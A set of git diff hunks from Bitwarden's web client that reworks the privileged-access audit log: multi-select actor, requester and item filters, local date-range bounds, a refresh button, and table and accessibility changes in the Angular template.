-/** The active audit-log filter. Every dimension is independent, and an unset one matches everything. */
+/**
+ * The active audit-log filter. Every dimension is independent, and an unset one matches everything.
+ *
+ * The identity dimensions are lists because their chips are multi-select: an auditor reconstructing an
+ * incident is usually following two or three people, not one, and narrowing to each in turn loses the
+ * order events happened in.
+ */
 export type AuditFilter = {
-  kindLabelKey: string | null;
-  /** An actor identity, or {@link AUTOMATED_ACTOR} for the system bucket. */
-  actorId?: string | null;
-  requesterId?: string | null;
+  kindLabelKey: readonly string[] | null;
+  /** Actor identities, or {@link AUTOMATED_ACTOR} for the system bucket. */
+  actorId?: readonly string[] | null;
+  requesterId?: readonly string[] | null;
   /** Inclusive lower bound on {@link AuditRow.occurredAt}. */
   from?: Date | null;
   /** Inclusive upper bound on {@link AuditRow.occurredAt}. */
   to?: Date | null;
 };
 
-/** Whether a row passes the filter. A null kind, a null identity and a null bound match everything. */
+/** Whether a row's value is one of those selected. An empty or absent selection matches everything. */
+function selects(selected: readonly string[] | null | undefined, value: string | null): boolean {
+  if (selected == null || selected.length === 0) {
+    return true;
+  }
+  return value != null && selected.includes(value);
+}
+
+/** Whether a row passes the filter. An empty selection and a null bound match everything. */
 export function auditRowMatchesFilter(row: AuditRow, filter: AuditFilter): boolean {
-  if (filter.kindLabelKey != null && row.kindLabelKey !== filter.kindLabelKey) {
+  if (!selects(filter.kindLabelKey, row.kindLabelKey)) {
     return false;
   }
   // The Actor cell reads "System" for every automated row whatever the wire carries as its actor, so the
   // buckets split on the effective identity that cell renders rather than on the row's own actor id.
-  const actorId = row.automated ? AUTOMATED_ACTOR : row.actorId;
-  if (filter.actorId != null && actorId !== filter.actorId) {
+  if (!selects(filter.actorId, row.automated ? AUTOMATED_ACTOR : row.actorId)) {
     return false;
   }
-  if (filter.requesterId != null && row.requesterId !== filter.requesterId) {
+  if (!selects(filter.requesterId, row.requesterId)) {
     return false;
   }
   const occurredAt = row.occurredAt.getTime();

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.ts
@@ -44,11 +44,16 @@ export type AuditRow = {
   /** True when the action's outcome never landed (only the write-ahead attempt) — shown as an in-doubt row. */
   inDoubt: boolean;
   /**
-   * The originating request, when the event has one. Carried but not rendered: the request-detail page
-   * is authorized for the requester or a managing approver, not for AccessEventLogs, so this trail
-   * offers no drill-down (see {@link AccessAuditComponent}).
+   * The originating request, when the event has one. Shown in the details drawer but never as a link:
+   * the request-detail page is authorized for the requester or a managing approver, not for
+   * AccessEventLogs, so this trail offers no drill-down (see {@link AccessAuditComponent}).
    */
   requestId: string | null;
+  /**
+   * The lease the event concerns, when it has one. Like {@link AuditRow.requestId} it opens nothing;
+   * it is carried so the details drawer can hand an auditor the id support would ask them for.
+   */
+  leaseId: string | null;
   /** The length of the granted access window, as an i18n key + value. Null on every other kind. */
   duration: LabelValue | null;
   /** The exact "from – to" window behind {@link duration}, for the cell's tooltip. Null whenever {@link duration} is. */
@@ -154,6 +159,7 @@ export function toAuditRow(
     automated: event.automated,
     inDoubt: event.incomplete,
     requestId: event.requestId,
+    leaseId: event.leaseId,
     duration: grantedWindow == null ? null : durationLabel(grantedWindow),
     exactWindow: grantedWindow == null ? null : exactWindow(grantedWindow),
     extendedUntil,

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.ts
@@ -29,6 +29,8 @@ export type AuditRow = {
   requesterEmail: string | null;
   /** Decrypted cipher name from local vault state, or null when the item isn't in the caller's vault. */
   cipherName: string | null;
+  /** The subject cipher, when the event names one — the entity the Item cell opens an event history for. */
+  cipherId: string | null;
   /** Decrypted collection name from local vault state, or null. */
   collectionName: string | null;
   /** The access rule's name (plaintext, provided by the server), for rule administration events; null otherwise. */
@@ -142,6 +144,7 @@ export function toAuditRow(
     requesterId: event.requesterId,
     requesterEmail: event.requesterEmail,
     cipherName,
+    cipherId: event.cipherId,
     collectionName,
     ruleName: event.ruleName,
     detail: event.detail,

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.ts
@@ -17,8 +17,12 @@ export type AuditRow = {
   kindLabelKey: string;
   /** Who performed it (name, falling back to email); null for a system / automatic event. */
   actor: string | null;
+  /** Who performed it, as an identity — the actor filter keys on this, since two members can share a display name. */
+  actorId: string | null;
   /** The access requester (name, falling back to email). */
   requester: string | null;
+  /** The access requester, as an identity — see {@link AuditRow.actorId}. */
+  requesterId: string | null;
   /** Decrypted cipher name from local vault state, or null when the item isn't in the caller's vault. */
   cipherName: string | null;
   /** Decrypted collection name from local vault state, or null. */
@@ -130,7 +134,9 @@ export function toAuditRow(
     occurredAt: new Date(event.occurredAt),
     kindLabelKey: selfEnded ? "pamAuditKindLeaseEndedByHolder" : auditKindLabelKey(event.kind),
     actor,
+    actorId: event.actorId,
     requester,
+    requesterId: event.requesterId,
     cipherName,
     collectionName,
     ruleName: event.ruleName,
@@ -148,12 +154,88 @@ export function toAuditRow(
   };
 }
 
-/** The active audit-log filter: free-text plus an optional event-kind label key. */
-export type AuditFilter = { text: string; kindLabelKey: string | null };
+/**
+ * The Actor filter's value for the system / automatic bucket, which has no actor identity of its own.
+ * Not a possible actor id: the server writes those as GUIDs.
+ */
+export const AUTOMATED_ACTOR = "automated";
 
-/** Whether a row passes the filter. Empty text and a null kind match everything. */
+const END_OF_MINUTE_MS = 59_999;
+
+/**
+ * Read a `datetime-local` value as an instant in the viewer's own zone, so a bound typed as 09:00 means
+ * 09:00 where the auditor is sitting — the same zone the Time column's `date` pipe renders in. Built from
+ * the parts rather than handed to `Date.parse`, which reads a *date-only* string as UTC and only this
+ * date-time form as local.
+ */
+function parseLocalDateTime(value: string): Date | null {
+  const parts = /^(\d{4})-(\d{2})-(\d{2})T(\d{2}):(\d{2})/.exec(value.trim());
+  if (parts == null) {
+    return null;
+  }
+  const [, year, month, day, hour, minute] = parts;
+  const parsed = new Date(
+    Number(year),
+    Number(month) - 1,
+    Number(day),
+    Number(hour),
+    Number(minute),
+  );
+  return Number.isFinite(parsed.getTime()) ? parsed : null;
+}
+
+/** The lower bound of an audit date range, from a `datetime-local` value. Blank or unparseable means unbounded. */
+export function auditRangeStart(value: string): Date | null {
+  return parseLocalDateTime(value);
+}
+
+/**
+ * The upper bound of an audit date range, from a `datetime-local` value. Blank or unparseable means unbounded.
+ * Carried to the end of the chosen minute, matching `EventService.formatDateFilters`, so a bound typed as 09:00
+ * still admits an event recorded at 09:00:30 — which the Time column also renders as 09:00.
+ */
+export function auditRangeEnd(value: string): Date | null {
+  const parsed = parseLocalDateTime(value);
+  return parsed == null ? null : new Date(parsed.getTime() + END_OF_MINUTE_MS);
+}
+
+/** The active audit-log filter. Every dimension is independent, and an unset one matches everything. */
+export type AuditFilter = {
+  text: string;
+  kindLabelKey: string | null;
+  /** An actor identity, or {@link AUTOMATED_ACTOR} for the system bucket. */
+  actorId?: string | null;
+  requesterId?: string | null;
+  /** Inclusive lower bound on {@link AuditRow.occurredAt}. */
+  from?: Date | null;
+  /** Inclusive upper bound on {@link AuditRow.occurredAt}. */
+  to?: Date | null;
+};
+
+/** Whether a row passes the filter. Empty text, a null kind, a null identity and a null bound match everything. */
 export function auditRowMatchesFilter(row: AuditRow, filter: AuditFilter): boolean {
   if (filter.kindLabelKey != null && row.kindLabelKey !== filter.kindLabelKey) {
+    return false;
+  }
+  if (filter.actorId != null) {
+    // The Actor cell reads "System" for every automated row whatever the wire carries as its actor, so the
+    // two buckets have to split the same way that cell does.
+    const wantsAutomated = filter.actorId === AUTOMATED_ACTOR;
+    if (wantsAutomated !== row.automated) {
+      return false;
+    }
+    if (!wantsAutomated && row.actorId !== filter.actorId) {
+      return false;
+    }
+  }
+  if (filter.requesterId != null && row.requesterId !== filter.requesterId) {
+    return false;
+  }
+  const occurredAt = row.occurredAt.getTime();
+  if (filter.from != null && occurredAt < filter.from.getTime()) {
+    return false;
+  }
+  if (filter.to != null && occurredAt > filter.to.getTime()) {
     return false;
   }
   const text = filter.text.trim().toLowerCase();

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.ts
@@ -35,6 +35,8 @@ export type AuditRow = {
   collectionName: string | null;
   /** The access rule's name (plaintext, provided by the server), for rule administration events; null otherwise. */
   ruleName: string | null;
+  /** The subject access rule, when the event names one — the identity behind a rule-named Item cell. */
+  ruleId: string | null;
   /** An approver comment or a revoke reason, if any. */
   detail: string | null;
   /** True for a system / automatic event (expiry, an automatic decision). */
@@ -147,6 +149,7 @@ export function toAuditRow(
     cipherId: event.cipherId,
     collectionName,
     ruleName: event.ruleName,
+    ruleId: event.ruleId,
     detail: event.detail,
     automated: event.automated,
     inDoubt: event.incomplete,
@@ -155,6 +158,30 @@ export function toAuditRow(
     exactWindow: grantedWindow == null ? null : exactWindow(grantedWindow),
     extendedUntil,
   };
+}
+
+/**
+ * The identity behind the Item cell, or null when that cell renders no item.
+ *
+ * Mirrors what the cell actually shows: a decrypted cipher name first, an access rule name second, an em
+ * dash otherwise. Keyed on the id rather than the label because two access rules can carry the same name,
+ * and merging them would let an auditor read half a rule's history as the whole of it. A row whose cipher
+ * did not decrypt in this viewer's vault has no name to render and so no identity to filter on — the same
+ * rule the Actor chip follows for an unresolved member.
+ */
+export function auditItemId(row: AuditRow): string | null {
+  if (row.cipherName != null) {
+    return row.cipherId;
+  }
+  if (row.ruleName != null) {
+    return row.ruleId;
+  }
+  return null;
+}
+
+/** The label the Item cell renders for a row, or null when it renders no item. */
+export function auditItemLabel(row: AuditRow): string | null {
+  return row.cipherName ?? row.ruleName;
 }
 
 /**
@@ -250,6 +277,8 @@ export type AuditFilter = {
   /** Actor identities, or {@link AUTOMATED_ACTOR} for the system bucket. */
   actorId?: readonly string[] | null;
   requesterId?: readonly string[] | null;
+  /** Item identities, as {@link auditItemId} reads them. A row with no item matches no selection. */
+  itemId?: readonly string[] | null;
   /** Inclusive lower bound on {@link AuditRow.occurredAt}. */
   from?: Date | null;
   /** Inclusive upper bound on {@link AuditRow.occurredAt}. */
@@ -275,6 +304,9 @@ export function auditRowMatchesFilter(row: AuditRow, filter: AuditFilter): boole
     return false;
   }
   if (!selects(filter.requesterId, row.requesterId)) {
+    return false;
+  }
+  if (!selects(filter.itemId, auditItemId(row))) {
     return false;
   }
   const occurredAt = row.occurredAt.getTime();

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit-row.ts
@@ -51,8 +51,6 @@ export type AuditRow = {
   exactWindow: string | null;
   /** A lease-extended event's new lease end (the wire's ISO string). Null on every other kind. */
   extendedUntil: string | null;
-  /** Lowercased haystack for the free-text filter: actor, requester, item, and detail. */
-  searchText: string;
 };
 
 /** The i18n key for an event kind's label. */
@@ -153,10 +151,6 @@ export function toAuditRow(
     duration: grantedWindow == null ? null : durationLabel(grantedWindow),
     exactWindow: grantedWindow == null ? null : exactWindow(grantedWindow),
     extendedUntil,
-    searchText: [actor, requester, cipherName, collectionName, event.ruleName, event.detail]
-      .filter((value): value is string => value != null)
-      .join(" ")
-      .toLowerCase(),
   };
 }
 
@@ -196,7 +190,6 @@ export function auditRangeEnd(value: string): Date | null {
 
 /** The active audit-log filter. Every dimension is independent, and an unset one matches everything. */
 export type AuditFilter = {
-  text: string;
   kindLabelKey: string | null;
   /** An actor identity, or {@link AUTOMATED_ACTOR} for the system bucket. */
   actorId?: string | null;
@@ -207,7 +200,7 @@ export type AuditFilter = {
   to?: Date | null;
 };
 
-/** Whether a row passes the filter. Empty text, a null kind, a null identity and a null bound match everything. */
+/** Whether a row passes the filter. A null kind, a null identity and a null bound match everything. */
 export function auditRowMatchesFilter(row: AuditRow, filter: AuditFilter): boolean {
   if (filter.kindLabelKey != null && row.kindLabelKey !== filter.kindLabelKey) {
     return false;
@@ -228,6 +221,5 @@ export function auditRowMatchesFilter(row: AuditRow, filter: AuditFilter): boole
   if (filter.to != null && occurredAt > filter.to.getTime()) {
     return false;
   }
-  const text = filter.text.trim().toLowerCase();
-  return text === "" || row.searchText.includes(text);
+  return true;
 }

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
@@ -229,6 +229,10 @@
                   it rather than all six: a trail is ninety days long, and a tab stop per cell would
                   put hundreds between an auditor and the end of the table. Pointer activation stays
                   on the row itself, so the cell must not repeat it — the click would arrive twice.
+
+                  `button` marks its children presentational, so the in-doubt badge below is not
+                  exposed as a node of its own and only reaches a screen reader through this cell's
+                  accessible name.
                 -->
                 <td
                   bitCell
@@ -237,7 +241,10 @@
                   class="tw-whitespace-nowrap focus-visible:tw-outline-none focus-visible:tw-ring-2 focus-visible:tw-ring-inset focus-visible:tw-ring-border-focus"
                   id="access-audit_button_details-{{ $index }}"
                   [attr.aria-label]="
-                    (row.kindLabelKey | i18n) + ' ' + (row.occurredAt | date: 'medium')
+                    (row.kindLabelKey | i18n) +
+                    ' ' +
+                    (row.occurredAt | date: 'medium') +
+                    (row.inDoubt ? ' ' + ('pamAuditIncomplete' | i18n) : '')
                   "
                   (keydown.enter)="openDetails(row)"
                   (keydown.space)="openDetails(row); $event.preventDefault()"

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
@@ -67,32 +67,27 @@
       ></bit-chip-filter>
     </div>
 
-    <div class="tw-mb-4">
-      <div class="tw-flex tw-flex-wrap tw-items-start tw-gap-3">
-        <bit-form-field disableMargin>
-          <bit-label>{{ "from" | i18n }}</bit-label>
-          <input
-            bitInput
-            type="datetime-local"
-            id="access-audit_input_from"
-            [placeholder]="'startDate' | i18n"
-            [formControl]="fromControl"
-          />
-        </bit-form-field>
-        <bit-form-field disableMargin>
-          <bit-label>{{ "to" | i18n }}</bit-label>
-          <input
-            bitInput
-            type="datetime-local"
-            id="access-audit_input_to"
-            [placeholder]="'endDate' | i18n"
-            [formControl]="toControl"
-          />
-        </bit-form-field>
-      </div>
-      @if (invertedRange()) {
-        <bit-error [error]="invalidRangeError"></bit-error>
-      }
+    <div class="tw-mb-4 tw-flex tw-flex-wrap tw-items-start tw-gap-3">
+      <bit-form-field disableMargin>
+        <bit-label>{{ "from" | i18n }}</bit-label>
+        <input
+          bitInput
+          type="datetime-local"
+          id="access-audit_input_from"
+          [placeholder]="'startDate' | i18n"
+          [formControl]="fromControl"
+        />
+      </bit-form-field>
+      <bit-form-field disableMargin>
+        <bit-label>{{ "to" | i18n }}</bit-label>
+        <input
+          bitInput
+          type="datetime-local"
+          id="access-audit_input_to"
+          [placeholder]="'endDate' | i18n"
+          [formControl]="toControl"
+        />
+      </bit-form-field>
     </div>
 
     @if (filteredRows().length === 0) {

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
@@ -54,36 +54,37 @@
     >
       <div class="tw-mt-7 tw-flex tw-min-h-10 tw-flex-wrap tw-items-center tw-gap-3">
         <!--
-          The option list sits inside an `@if` rather than directly under the chip. `refreshView` runs a
+          Each option list sits inside an `@if` rather than directly under its chip. `refreshView` runs a
           view's effects before it updates that view's embedded views, so an option created by a `@for` in
           the chip's own host view is visible to `bit-filter-menu`'s summary effect a beat before Angular
-          has bound its required `value` — which throws NG0950 the first time Update brings a new event
-          kind into the trail. Nesting the loop one view deeper moves the option's creation after those
-          effects have run, so the chip only ever sees a fully bound option.
+          has bound its required `value` — which throws NG0950 the first time a refresh brings a new event
+          kind or a new member into the trail. Nesting the loop one view deeper moves the option's creation
+          after those effects have run, so the chip only ever sees a fully bound option.
         -->
-        <bit-filter-menu
-          key="kind"
-          [placeholderText]="'pamAuditColumnEvent' | i18n"
-          [unsetLabel]="'all' | i18n"
-        >
+        <bit-filter-menu [key]="filterKeys.kind" [placeholderText]="'pamAuditColumnEvent' | i18n">
           @if (kindOptions(); as options) {
             @for (option of options; track option.value) {
               <bit-filter-option [value]="option.value">{{ option.label }}</bit-filter-option>
             }
           }
         </bit-filter-menu>
-        <bit-chip-filter
-          [placeholderText]="'pamAuditColumnActor' | i18n"
-          placeholderIcon="bwi-filter"
-          [options]="actorOptions()"
-          [formControl]="actorControl"
-        ></bit-chip-filter>
-        <bit-chip-filter
+        <bit-filter-menu [key]="filterKeys.actor" [placeholderText]="'pamAuditColumnActor' | i18n">
+          @if (actorOptions(); as options) {
+            @for (option of options; track option.value) {
+              <bit-filter-option [value]="option.value">{{ option.label }}</bit-filter-option>
+            }
+          }
+        </bit-filter-menu>
+        <bit-filter-menu
+          [key]="filterKeys.requester"
           [placeholderText]="'pamAuditColumnRequester' | i18n"
-          placeholderIcon="bwi-filter"
-          [options]="requesterOptions()"
-          [formControl]="requesterControl"
-        ></bit-chip-filter>
+        >
+          @if (requesterOptions(); as options) {
+            @for (option of options; track option.value) {
+              <bit-filter-option [value]="option.value">{{ option.label }}</bit-filter-option>
+            }
+          }
+        </bit-filter-menu>
       </div>
       <bit-form-field disableMargin>
         <bit-label>{{ "from" | i18n }}</bit-label>

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
@@ -194,12 +194,28 @@
             <tr>
               <th bitCell class="tw-whitespace-nowrap">{{ "timestamp" | i18n }}</th>
               <th bitCell class="tw-whitespace-nowrap">{{ "pamAuditColumnEvent" | i18n }}</th>
-              <th bitCell>{{ "pamAuditColumnActor" | i18n }}</th>
-              <th bitCell>{{ "pamAuditColumnRequester" | i18n }}</th>
+              <!--
+                Actor, Requester and Duration stand down while the drawer is beside the table. Six
+                columns do not fit the half-width the drawer leaves, and these three are the ones the
+                reader loses least by: the pane they just opened already shows all three for the
+                selected row, actor and requester are a small repeating set of names across the trail,
+                and duration is an em dash on most kinds. Timestamp, Event and Item stay because they
+                are what keeps a place in the list — Item being what separates a run of rows sharing
+                one event label. `tw-hidden` rather than an opacity or width class, so the cells leave
+                the accessibility tree with the layout and no anchor is left focusable but unreadable.
+              -->
+              <th bitCell [class.tw-hidden]="detailsOpen()">
+                {{ "pamAuditColumnActor" | i18n }}
+              </th>
+              <th bitCell [class.tw-hidden]="detailsOpen()">
+                {{ "pamAuditColumnRequester" | i18n }}
+              </th>
               <th bitCell class="tw-min-w-48 tw-max-w-64 tw-break-words">
                 {{ "pamAuditColumnItem" | i18n }}
               </th>
-              <th bitCell>{{ "pamAuditColumnDuration" | i18n }}</th>
+              <th bitCell [class.tw-hidden]="detailsOpen()">
+                {{ "pamAuditColumnDuration" | i18n }}
+              </th>
             </tr>
           </ng-container>
           <ng-template body>
@@ -236,7 +252,7 @@
                     >
                   }
                 </td>
-                <td bitCell>
+                <td bitCell [class.tw-hidden]="detailsOpen()">
                   @if (row.automated) {
                     <span class="tw-text-muted">{{ "pamAuditSystem" | i18n }}</span>
                   } @else if (linkedMember(row.actorId, row.actor); as member) {
@@ -254,7 +270,7 @@
                     <span class="tw-text-muted">—</span>
                   }
                 </td>
-                <td bitCell>
+                <td bitCell [class.tw-hidden]="detailsOpen()">
                   @if (linkedMember(row.requesterId, row.requester); as member) {
                     <a
                       bitLink
@@ -288,7 +304,7 @@
                     <span class="tw-text-muted">—</span>
                   }
                 </td>
-                <td bitCell>
+                <td bitCell [class.tw-hidden]="detailsOpen()">
                   @if (row.duration; as duration) {
                     <span class="tw-whitespace-nowrap" [bitTooltip]="row.exactWindow">{{
                       duration.key | i18n: duration.value

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
@@ -24,6 +24,16 @@
       <bit-svg slot="graphic" [content]="noResultsSvg"></bit-svg>
       <span slot="title">{{ "pamAuditEmptyTitle" | i18n }}</span>
       <span slot="description">{{ "pamAuditEmptyMessage" | i18n }}</span>
+      <button
+        slot="button"
+        type="button"
+        bitButton
+        buttonType="primary"
+        id="access-audit_button_refresh"
+        [bitAction]="load"
+      >
+        {{ "update" | i18n }}
+      </button>
       @if (canManageAccessRules()) {
         <a
           slot="button"

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
@@ -172,9 +172,20 @@
     </div>
 
     @if (filteredRows().length === 0) {
-      <bit-callout type="info" [title]="'pamAuditNoMatchesTitle' | i18n">
-        {{ "pamAuditNoMatchesMessage" | i18n }}
-      </bit-callout>
+      <bit-no-items>
+        <span slot="title">{{ "pamAuditNoMatchesTitle" | i18n }}</span>
+        <span slot="description">{{ "pamAuditNoMatchesMessage" | i18n }}</span>
+        <button
+          slot="button"
+          type="button"
+          bitButton
+          buttonType="secondary"
+          id="access-audit_button_no-matches-clear-all"
+          (click)="clearAll()"
+        >
+          {{ "clearAll" | i18n }}
+        </button>
+      </bit-no-items>
     } @else {
       <div class="tw-overflow-x-auto">
         <bit-table>

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
@@ -222,8 +222,10 @@
                       (click)="openMemberEvents($event, member)"
                       >{{ row.actor }}</a
                     >
-                  } @else {
+                  } @else if (row.actor) {
                     {{ row.actor }}
+                  } @else {
+                    <span class="tw-text-muted">—</span>
                   }
                 </td>
                 <td bitCell>
@@ -236,8 +238,10 @@
                       (click)="openMemberEvents($event, member)"
                       >{{ row.requester }}</a
                     >
-                  } @else {
+                  } @else if (row.requester) {
                     {{ row.requester }}
+                  } @else {
+                    <span class="tw-text-muted">—</span>
                   }
                 </td>
                 <td bitCell class="tw-max-w-64 tw-break-words">
@@ -271,7 +275,13 @@
                     <span class="tw-text-muted">—</span>
                   }
                 </td>
-                <td bitCell class="tw-max-w-64 tw-break-words">{{ row.detail }}</td>
+                <td bitCell class="tw-max-w-64 tw-break-words">
+                  @if (row.detail) {
+                    {{ row.detail }}
+                  } @else {
+                    <span class="tw-text-muted">—</span>
+                  }
+                </td>
               </tr>
             }
           </ng-template>

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
@@ -39,11 +39,6 @@
   }
   @case ("ready") {
     <div class="tw-mb-4 tw-flex tw-flex-wrap tw-items-center tw-gap-3">
-      <bit-search
-        class="tw-grow tw-max-w-md"
-        [placeholder]="'pamAuditSearchPlaceholder' | i18n"
-        [formControl]="searchControl"
-      ></bit-search>
       <bit-filter-menu
         key="kind"
         [placeholderText]="'pamAuditColumnEvent' | i18n"

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
@@ -85,6 +85,7 @@
         -->
         <bit-filter-menu
           #kindFilter
+          multiple
           [key]="filterKeys.kind"
           [placeholderText]="'pamAuditColumnEvent' | i18n"
         >
@@ -96,6 +97,7 @@
         </bit-filter-menu>
         <bit-filter-menu
           #actorFilter
+          multiple
           [key]="filterKeys.actor"
           [placeholderText]="'pamAuditColumnActor' | i18n"
         >
@@ -107,6 +109,7 @@
         </bit-filter-menu>
         <bit-filter-menu
           #requesterFilter
+          multiple
           [key]="filterKeys.requester"
           [placeholderText]="'pamAuditColumnRequester' | i18n"
         >

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
@@ -38,42 +38,43 @@
     </bit-status-lockup>
   }
   @case ("ready") {
-    <div class="tw-mb-4 tw-flex tw-flex-wrap tw-items-center tw-gap-3">
-      <bit-filter-menu
-        key="kind"
-        [placeholderText]="'pamAuditColumnEvent' | i18n"
-        [unsetLabel]="'all' | i18n"
-      >
-        @for (option of kindOptions(); track option.value) {
-          <bit-filter-option [value]="option.value">{{ option.label }}</bit-filter-option>
-        }
-      </bit-filter-menu>
-      <bit-chip-filter
-        [placeholderText]="'pamAuditColumnActor' | i18n"
-        placeholderIcon="bwi-filter"
-        [options]="actorOptions()"
-        [formControl]="actorControl"
-      ></bit-chip-filter>
-      <bit-chip-filter
-        [placeholderText]="'pamAuditColumnRequester' | i18n"
-        placeholderIcon="bwi-filter"
-        [options]="requesterOptions()"
-        [formControl]="requesterControl"
-      ></bit-chip-filter>
-      <button
-        type="button"
-        bitButton
-        buttonType="secondary"
-        class="tw-ms-auto"
-        id="access-audit_button_export"
-        [bitAction]="exportCsv"
-        [disabled]="filteredRows().length === 0"
-      >
-        {{ "exportVerb" | i18n }}
-      </button>
-    </div>
-
-    <div class="tw-mb-4 tw-flex tw-flex-wrap tw-items-start tw-gap-3">
+    <div
+      class="tw-mb-4 tw-flex tw-flex-wrap tw-items-start tw-gap-3"
+      id="access-audit_container_toolbar"
+    >
+      <div class="tw-mt-7 tw-flex tw-min-h-10 tw-flex-wrap tw-items-center tw-gap-3">
+        <!--
+          The option list sits inside an `@if` rather than directly under the chip. `refreshView` runs a
+          view's effects before it updates that view's embedded views, so an option created by a `@for` in
+          the chip's own host view is visible to `bit-filter-menu`'s summary effect a beat before Angular
+          has bound its required `value` — which throws NG0950 the first time Update brings a new event
+          kind into the trail. Nesting the loop one view deeper moves the option's creation after those
+          effects have run, so the chip only ever sees a fully bound option.
+        -->
+        <bit-filter-menu
+          key="kind"
+          [placeholderText]="'pamAuditColumnEvent' | i18n"
+          [unsetLabel]="'all' | i18n"
+        >
+          @if (kindOptions(); as options) {
+            @for (option of options; track option.value) {
+              <bit-filter-option [value]="option.value">{{ option.label }}</bit-filter-option>
+            }
+          }
+        </bit-filter-menu>
+        <bit-chip-filter
+          [placeholderText]="'pamAuditColumnActor' | i18n"
+          placeholderIcon="bwi-filter"
+          [options]="actorOptions()"
+          [formControl]="actorControl"
+        ></bit-chip-filter>
+        <bit-chip-filter
+          [placeholderText]="'pamAuditColumnRequester' | i18n"
+          placeholderIcon="bwi-filter"
+          [options]="requesterOptions()"
+          [formControl]="requesterControl"
+        ></bit-chip-filter>
+      </div>
       <bit-form-field disableMargin>
         <bit-label>{{ "from" | i18n }}</bit-label>
         <input
@@ -94,6 +95,28 @@
           [formControl]="toControl"
         />
       </bit-form-field>
+      <button
+        type="button"
+        bitButton
+        buttonType="primary"
+        class="tw-mt-7"
+        id="access-audit_button_refresh"
+        [bitAction]="load"
+      >
+        {{ "update" | i18n }}
+      </button>
+      <button
+        type="button"
+        bitButton
+        buttonType="secondary"
+        class="tw-ms-auto tw-mt-7"
+        id="access-audit_button_export"
+        endIcon="bwi-import"
+        [bitAction]="exportCsv"
+        [disabled]="filteredRows().length === 0"
+      >
+        {{ "exportVerb" | i18n }}
+      </button>
     </div>
 
     @if (filteredRows().length === 0) {

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
@@ -172,7 +172,8 @@
     </div>
 
     @if (filteredRows().length === 0) {
-      <bit-no-items>
+      <bit-status-lockup>
+        <bit-svg slot="graphic" [content]="noResultsSvg"></bit-svg>
         <span slot="title">{{ "pamAuditNoMatchesTitle" | i18n }}</span>
         <span slot="description">{{ "pamAuditNoMatchesMessage" | i18n }}</span>
         <button
@@ -185,7 +186,7 @@
         >
           {{ "clearAll" | i18n }}
         </button>
-      </bit-no-items>
+      </bit-status-lockup>
     } @else {
       <div class="tw-overflow-x-auto">
         <bit-table>

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
@@ -101,72 +101,76 @@
         {{ "pamAuditNoMatchesMessage" | i18n }}
       </bit-callout>
     } @else {
-      <bit-table>
-        <ng-container header>
-          <tr>
-            <th bitCell>{{ "pamAuditColumnTime" | i18n }}</th>
-            <th bitCell>{{ "pamAuditColumnEvent" | i18n }}</th>
-            <th bitCell>{{ "pamAuditColumnActor" | i18n }}</th>
-            <th bitCell>{{ "pamAuditColumnRequester" | i18n }}</th>
-            <th bitCell>{{ "pamAuditColumnItem" | i18n }}</th>
-            <th bitCell>{{ "pamAuditColumnDuration" | i18n }}</th>
-            <th bitCell>{{ "pamAuditColumnDetail" | i18n }}</th>
-          </tr>
-        </ng-container>
-        <ng-template body>
-          @for (row of filteredRows(); track $index) {
-            <tr bitRow>
-              <td bitCell>
-                <span [bitTooltip]="row.occurredAt | date: 'medium'">{{
-                  row.occurredAt | date: "short"
-                }}</span>
-              </td>
-              <td bitCell>
-                {{ row.kindLabelKey | i18n }}
-                @if (row.inDoubt) {
-                  <span
-                    bitBadge
-                    variant="warning"
-                    [bitTooltip]="'pamAuditIncompleteTooltip' | i18n"
-                    >{{ "pamAuditIncomplete" | i18n }}</span
-                  >
-                }
-              </td>
-              <td bitCell>
-                @if (row.automated) {
-                  <span class="tw-text-muted">{{ "pamAuditSystem" | i18n }}</span>
-                } @else {
-                  {{ row.actor }}
-                }
-              </td>
-              <td bitCell>{{ row.requester }}</td>
-              <td bitCell>
-                @if (row.cipherName) {
-                  <span [bitTooltip]="row.collectionName">{{ row.cipherName }}</span>
-                } @else if (row.ruleName) {
-                  {{ row.ruleName }}
-                } @else {
-                  <span class="tw-text-muted">—</span>
-                }
-              </td>
-              <td bitCell>
-                @if (row.duration; as duration) {
